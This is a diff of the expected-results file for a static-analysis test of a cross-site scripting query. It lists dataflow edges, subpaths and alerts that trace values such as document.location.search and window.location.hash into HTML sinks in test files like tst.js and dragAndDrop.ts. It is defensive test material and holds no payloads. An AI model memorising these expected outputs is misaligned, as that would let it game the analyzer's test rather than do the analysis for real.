bstr(1) | provenance | | -| tst.js:416:17:416:36 | window.location.hash | tst.js:416:17:416:46 | window. ... bstr(1) | provenance | Config | -| tst.js:416:17:416:46 | window. ... bstr(1) | tst.js:416:7:416:46 | payload | provenance | | -| tst.js:419:7:419:55 | match | tst.js:421:20:421:24 | match | provenance | | -| tst.js:419:15:419:34 | window.location.hash | tst.js:419:15:419:55 | window. ... (\\w+)/) | provenance | | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | tst.js:419:7:419:55 | match | provenance | | -| tst.js:421:20:421:24 | match | tst.js:421:20:421:27 | match[1] | provenance | | -| tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:48 | window. ... it('#') [1] | provenance | Config | -| tst.js:424:18:424:48 | window. ... it('#') [1] | tst.js:424:18:424:51 | window. ... '#')[1] | provenance | | -| tst.js:428:7:428:39 | target | tst.js:430:18:430:23 | target | provenance | | -| tst.js:428:16:428:39 | documen ... .search | tst.js:428:7:428:39 | target | provenance | | -| tst.js:430:18:430:23 | target | tst.js:430:18:430:89 | target. ... data>') | provenance | | -| tst.js:436:6:436:38 | source | tst.js:440:28:440:33 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:441:33:441:38 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:442:34:442:39 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:443:41:443:46 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:444:44:444:49 | source | provenance | | -| tst.js:436:6:436:38 | source | tst.js:445:32:445:37 | source | provenance | | -| tst.js:436:15:436:38 | documen ... .search | tst.js:436:6:436:38 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:455:18:455:23 | source | provenance | | -| tst.js:453:7:453:39 | source | tst.js:456:36:456:41 | source | provenance | | -| tst.js:453:16:453:39 | documen ... 
.search | tst.js:453:7:453:39 | source | provenance | | -| tst.js:456:36:456:41 | source | tst.js:456:18:456:42 | ansiToH ... source) | provenance | | -| tst.js:460:6:460:38 | source | tst.js:463:21:463:26 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:465:19:465:24 | source | provenance | | -| tst.js:460:6:460:38 | source | tst.js:467:20:467:25 | source | provenance | | -| tst.js:460:15:460:38 | documen ... .search | tst.js:460:6:460:38 | source | provenance | | -| tst.js:471:7:471:46 | url | tst.js:473:19:473:21 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:474:26:474:28 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:475:25:475:27 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:476:20:476:22 | url | provenance | | -| tst.js:471:7:471:46 | url | tst.js:486:22:486:24 | url | provenance | | -| tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... 
t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... 
ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... 
search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... 
.search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... 
.search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... 
Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... 
hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... 
.search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... 
bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... 
.search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | 
@@ -1212,18 +1212,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | @@ -1289,7 +1289,7 @@ subpaths | dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | | dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | | event-handler-receiver.js:2:31:2:83 | '

' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

